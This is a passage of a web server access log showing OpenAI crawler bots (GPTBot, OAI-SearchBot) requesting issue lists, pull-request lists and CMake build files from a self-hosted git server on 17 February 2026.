200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=closed&type=all" +[17/Feb/2026:19:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:19:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:19:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12093] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:19:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11280] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:11:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15664] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:19:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] 